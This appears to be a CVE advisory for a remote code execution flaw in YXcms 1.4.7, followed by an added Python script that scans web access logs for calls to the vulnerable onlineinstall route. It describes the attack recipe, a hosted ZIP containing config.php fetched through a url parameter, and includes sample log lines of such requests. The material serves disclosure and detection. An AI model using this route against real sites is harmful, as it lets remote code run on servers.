Remote Code Execution Vulnerability in YXcms 1.4.7 via ZIP Archive Upload

CVE-2018-19404 · MEDIUM Severity

AV:N/AC:L/AU:S/C:P/I:P/A:P

In YXcms 1.4.7, protected/apps/appmanage/controller/indexController.php allows remote authenticated Administrators to execute any PHP code by creating a ZIP archive containing a config.php file, hosting the .zip file at an external URL, and visiting index.php?r=appmanage/index/onlineinstall&url= followed by that URL. This is related to the onlineinstall and import functions.
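A log check for the request described above, as an added example that is not part of the original advisory or of YXcms. It assumes combined-format web access logs and that both parameters arrive in the query string as the advisory shows; the function name, sample log lines, client addresses and hosts are constructed.

```python
import re
from urllib.parse import parse_qs, urlsplit

# Combined log format: client, identity, user, [time], "METHOD target PROTO", status
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3})')

# Route named in the advisory (value of the r= parameter)
ROUTE = "appmanage/index/onlineinstall"


def find_onlineinstall(lines):
    """Return one record per request that calls onlineinstall with a url parameter."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # not an access-log line we can parse
        # parse_qs percent-decodes, so r=appmanage%2Findex%2Fonlineinstall matches too
        query = parse_qs(urlsplit(m["target"]).query, keep_blank_values=True)
        # Assumption: compare case-insensitively so the check errs towards reporting
        route = query.get("r", [""])[0].strip("/").lower()
        if route != ROUTE or "url" not in query:
            continue
        remote = query["url"][0]
        hits.append({
            "client": m["ip"],
            "time": m["ts"],
            "status": int(m["status"]),
            "archive_url": remote,
            "archive_host": urlsplit(remote).hostname,  # host the archive was fetched from
        })
    return hits


# Constructed sample lines (documentation addresses and example hosts)
SAMPLE_LOG = [
    '203.0.113.7 - - [12/Nov/2018:10:01:02 +0000] "GET /index.php?r=appmanage/index/index HTTP/1.1" 200 5120',
    '203.0.113.7 - - [12/Nov/2018:10:01:40 +0000] "GET /index.php?r=appmanage/index/onlineinstall&url=http://files.example.net/app.zip HTTP/1.1" 200 311',
    '198.51.100.9 - - [12/Nov/2018:10:05:11 +0000] "GET /index.php?r=appmanage%2Findex%2Fonlineinstall&url=http%3A%2F%2Ffiles.example.net%2Fapp.zip HTTP/1.1" 302 0',
    '198.51.100.9 - - [12/Nov/2018:10:06:00 +0000] "GET /index.php?r=default/index/index HTTP/1.1" 200 9000',
]

if __name__ == "__main__":
    for hit in find_onlineinstall(SAMPLE_LOG):
        print(hit)
```

Parameters sent in a POST body do not appear in the access log's request line, so covering those requires application or WAF logging.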
